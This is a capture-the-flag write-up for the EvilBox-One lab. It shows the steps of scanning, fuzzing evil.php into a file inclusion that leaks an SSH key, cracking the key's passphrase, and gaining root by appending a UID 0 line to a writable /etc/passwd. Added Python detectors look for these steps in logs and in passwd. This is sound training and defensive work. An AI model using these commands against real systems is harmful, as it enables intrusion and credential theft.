Key takeaways
- Much like black-box testing: with no clues at all you can only guess, and if a PHP file turns up, getting in becomes considerably easier.
- Even once you have a PHP file, without its source code the only thing you can do is test whether it has a file inclusion vulnerability.
- So when there are no leads, guessing is the only option.
Steps
An nmap scan shows only ports 22 and 80 open, and port 80 serves nothing but the Apache default page, so there are no clues there.
```text
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-02 12:58 UTC
Nmap scan report for 192.168.56.212
Host is up (0.0011s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 44:95:50:0b:e4:73:a1:85:11:ca:10:ec:1c:cb:d4:26 (RSA)
|   256 27:db:6a:c7:3a:9c:5a:0e:47:ba:8d:81:eb:d6:d6:3c (ECDSA)
|_  256 e3:07:56:a9:25:63:d4:ce:39:01:c1:9a:d9:fe:de:64 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
```
Nikto, however, reports some extra information: robots.txt and a /secret/ path.
```text
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.56.212
+ Target Hostname:    192.168.56.212
+ Target Port:        80
+ Start Time:         2024-12-02 12:59:17 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.38 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Server may leak inodes via ETags, header found with file /, inode: 29cd, size: 5c9a9bb4d712e, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: POST, OPTIONS, HEAD, GET .
+ /secret/: This might be interesting.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ 8102 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2024-12-02 12:59:33 (GMT0) (16 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
```
robots.txt contains only `Hello H4x0r`, which did not seem useful, and with few other leads the next step was to brute-force the /secret/ path for PHP files, which turned up evil.php.
```text
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.225.212/secret/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/SecLists/Discovery/Web-Content/big.txt
[+] Negative Status codes:   502,404,429,503,400
[+] User Agent:              gobuster/3.6
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 280]
/.htaccess.php        (Status: 403) [Size: 280]
/.htpasswd.php        (Status: 403) [Size: 280]
/.htpasswd            (Status: 403) [Size: 280]
/evil.php             (Status: 200) [Size: 0]
```
Testing for a file inclusion vulnerability by fuzzing the parameter name confirms that one exists, and that the parameter is called command.
```text
C:\home\kali\Documents\OFFSEC\play\EvilBox-One> ffuf -w /usr/share/SecLists/Discovery/Web-Content/common.txt -u http://192.168.225.212/secret/evil.php?FUZZ=/etc/passwd -fs 0

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.225.212/secret/evil.php?FUZZ=/etc/passwd
 :: Wordlist         : FUZZ: /usr/share/SecLists/Discovery/Web-Content/common.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 0
________________________________________________

command                 [Status: 200, Size: 1398, Words: 13, Lines: 27, Duration: 448ms]
:: Progress: [4730/4730] :: Job [1/1] :: 92 req/sec :: Duration: [0:00:57] :: Errors: 0 ::
```
Including /etc/passwd and then /home/mowree/.ssh/id_rsa yields a private key to log in with. One thing to watch out for: if you open http://192.168.225.212/secret/evil.php?command=/home/mowree/.ssh/id_rsa in a browser, you must use "view page source" to get the RSA key file with its formatting intact; otherwise it cannot be used.
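From the defender's side, the whole chain above (a parameter fuzzed until it accepts a path, then /etc/passwd and a user's id_rsa read through the web server) is visible in the Apache access log. The following is an added example, not part of the original writeup and not code from the box: it parses combined-format log lines and flags query parameters that carry traversal sequences or absolute paths to sensitive files, and it separates requests that were actually served (HTTP 200 with a non-empty body, like the Size: 1398 hit above) from mere probes. The log lines are constructed for the example; the path list and the `command` parameter name are assumptions modelled on this writeup.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample lines in Apache "combined" log format; they are not taken
# from the target box, only modelled on the requests the writeup describes.
SAMPLE_LOG = """\
192.168.225.1 - - [02/Dec/2024:13:01:10 +0000] "GET /secret/evil.php?command=/etc/passwd HTTP/1.1" 200 1398 "-" "curl/7.88.1"
192.168.225.1 - - [02/Dec/2024:13:01:11 +0000] "GET /secret/evil.php?command=/home/mowree/.ssh/id_rsa HTTP/1.1" 200 2602 "-" "Mozilla/5.0"
192.168.225.1 - - [02/Dec/2024:13:01:12 +0000] "GET /secret/evil.php?command=..%2f..%2f..%2fetc%2fshadow HTTP/1.1" 200 0 "-" "curl/7.88.1"
192.168.225.1 - - [02/Dec/2024:13:02:00 +0000] "GET /index.html HTTP/1.1" 200 10701 "-" "Mozilla/5.0"
192.168.225.1 - - [02/Dec/2024:13:02:01 +0000] "GET /secret/evil.php?command=about HTTP/1.1" 200 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Path fragments a web application has no business reading from a query parameter
# (assumed list; extend it for the application being monitored).
SENSITIVE_PATHS = ("/etc/passwd", "/etc/shadow", "/.ssh/", "/proc/self/", "/var/log/")


def classify_value(value):
    """Return a reason string if a parameter value looks like a file-inclusion probe, else None."""
    # parse_qsl already decoded once; decoding twice more catches %252e-style double encoding.
    v = unquote(unquote(value)).replace("\\", "/")
    if "../" in v or v.endswith(".."):
        return "path traversal"
    for p in SENSITIVE_PATHS:
        if p in v:
            return f"sensitive path {p}"
    return None


def scan_log(text):
    """Parse combined-format lines and flag query parameters carrying file paths."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        size = int(m.group("size")) if m.group("size").isdigit() else 0
        status = int(m.group("status"))
        query = urlsplit(m.group("target")).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            reason = classify_value(value)
            if reason is None:
                continue
            findings.append({
                "ip": m.group("ip"),
                "time": m.group("ts"),
                "param": name,
                "value": value,
                "reason": reason,
                # A 200 with a non-empty body means the include most likely succeeded,
                # which is what separates a probe from an actual disclosure.
                "served": status == 200 and size > 0,
            })
    return findings


def summarize(findings):
    """Count flagged requests per source IP, for alerting thresholds."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    results = scan_log(SAMPLE_LOG)
    for f in results:
        flag = "DISCLOSED" if f["served"] else "probe"
        print(f"{f['time']} {f['ip']} {f['param']}={f['value']!r}: {f['reason']} [{flag}]")
    print(summarize(results))
```

Run over a real access log with `scan_log(open("/var/log/apache2/access.log").read())`; the `served` flag is the one to alert on, since a 200 with a body is the moment a file left the server. The fix on the application side is the usual one: never pass user input to `include`, and map the parameter to an allowlist of page names instead.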
Trying to log in over SSH with the key prompts for a passphrase. The string from robots.txt does not work, so the passphrase is cracked with john, which recovers unicorn; with that passphrase the login succeeds.
```text
C:\home\kali\Documents\OFFSEC\play\EvilBox-One> ssh2john id_rsa >id_rsa.hash
C:\home\kali\Documents\OFFSEC\play\EvilBox-One> john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
unicorn          (id_rsa)
1g 0:00:00:00 DONE (2024-12-02 22:35) 33.33g/s 41600p/s 41600c/s 41600C/s ramona..shirley
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
C:\home\kali\Documents\OFFSEC\play\EvilBox-One> ssh -i id_rsa mowree@192.168.225.212
Enter passphrase for key 'id_rsa':
Linux EvilBoxOne 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
mowree@EvilBoxOne:~$
```
After logging in, checking SUID binaries and sudo -l turns up nothing, but uploading and running linpeas.sh shows that /etc/passwd is readable and writable by every user.
```text
╔══════════╣ AppArmor binary profiles
-rw-r--r-- 1 root root 3129 feb 10 2019 usr.bin.man
═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ /etc/passwd is writable
═╣ Credentials in fstab/mtab? ........... No
═╣ Can I read shadow files? ............. No
═╣ Can I read shadow plists? ............ No
═╣ Can I write shadow plists? ........... No
═╣ Can I read opasswd file? ............. No
═╣ Can I write in network-scripts? ...... No
═╣ Can I read root folder? .............. No
```
All that is needed is to construct a passwd record and append it to /etc/passwd.
```text
mowree@EvilBoxOne:~$ openssl passwd 1234
iQPI1FVnABms.
mowree@EvilBoxOne:~$ echo "tim:iQPI1FVnABms.:0:0:root:/root:/bin/bash" >> /etc/passwd
mowree@EvilBoxOne:~$ su tim
Contraseña:
root@EvilBoxOne:/home/mowree# cat /root/proof.txt
d8033de92c0ee15a21ae22c39b979663
root@EvilBoxOne:/home/mowree# cat local.txt
07894098e76a0de660070a673dd51a6e
```
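The root step works because two separate things went wrong on the host: /etc/passwd was writable by non-root users, and nothing noticed that a second UID 0 account carrying a password hash in the passwd file itself had appeared. Both are cheap to check, and linpeas' "Writable passwd file?" and "Hashes inside passwd file?" lines above are exactly these checks from the attacker's side. The following is an added example, not part of the writeup and not the box's code, of the same audit from the defender's side: it parses passwd(5) lines, flags group- or world-writable mode, extra UID 0 accounts, empty password fields, hashes stored in passwd instead of shadow, malformed lines, and accounts missing from a baseline. The sample content is constructed to mirror the file after the `tim` record was appended.

```python
import os
import stat

# Constructed sample modelled on the writeup's final state, after the "tim"
# record was appended. It is not the box's real /etc/passwd.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
mowree:x:1000:1000:mowree,,,:/home/mowree:/bin/bash
tim:iQPI1FVnABms.:0:0:root:/root:/bin/bash
"""

# Second-field values that mean "no hash here": shadowed or locked.
NO_HASH_MARKERS = {"x", "*", "!", "!!"}


def parse_passwd(text):
    """Split passwd(5) lines into dicts; malformed lines are kept and marked."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7 or not fields[2].isdigit() or not fields[3].isdigit():
            entries.append({"line": lineno, "malformed": True, "raw": line})
            continue
        name, pw, uid, gid, _gecos, home, shell = fields
        entries.append({
            "line": lineno, "malformed": False, "name": name, "pw": pw,
            "uid": int(uid), "gid": int(gid), "home": home, "shell": shell,
        })
    return entries


def audit_passwd(text, mode=None, baseline_names=None):
    """Return (severity, message) findings for passwd content and, optionally, its st_mode."""
    findings = []
    # Debian ships /etc/passwd as 0644 root:root; any group or other write bit is an anomaly.
    if mode is not None and mode & (stat.S_IWOTH | stat.S_IWGRP):
        findings.append(("HIGH", "/etc/passwd is group- or world-writable (mode %o)" % stat.S_IMODE(mode)))
    for e in parse_passwd(text):
        if e["malformed"]:
            findings.append(("MEDIUM", f"line {e['line']}: malformed entry {e['raw']!r}"))
            continue
        if e["uid"] == 0 and e["name"] != "root":
            findings.append(("HIGH", f"line {e['line']}: extra UID 0 account '{e['name']}'"))
        if e["pw"] == "":
            findings.append(("HIGH", f"line {e['line']}: empty password field for '{e['name']}'"))
        elif e["pw"] not in NO_HASH_MARKERS:
            # A hash in passwd is readable by everyone and bypasses /etc/shadow entirely.
            findings.append(("HIGH", f"line {e['line']}: password hash stored in passwd for '{e['name']}'"))
        if baseline_names is not None and e["name"] not in baseline_names:
            findings.append(("MEDIUM", f"line {e['line']}: account '{e['name']}' not in baseline"))
    return findings


def audit_file(path="/etc/passwd", baseline_names=None):
    """Audit a real file on the host, taking the mode from os.stat."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    return audit_passwd(text, mode=os.stat(path).st_mode, baseline_names=baseline_names)


if __name__ == "__main__":
    # Run against the constructed sample with a world-writable mode (0666) so the
    # output shows what the checks catch; use audit_file() on a live host instead.
    for sev, msg in audit_passwd(SAMPLE_PASSWD, mode=stat.S_IFREG | 0o666):
        print(sev, msg)
```

Scheduling `audit_file()` with a baseline of expected account names turns the appended `tim` line into an alert within one run, and the mode check catches the misconfiguration before anyone uses it. The remediation is `chmod 0644 /etc/passwd` plus removal of the extra entry and a password reset for any account whose hash sat in the world-readable file.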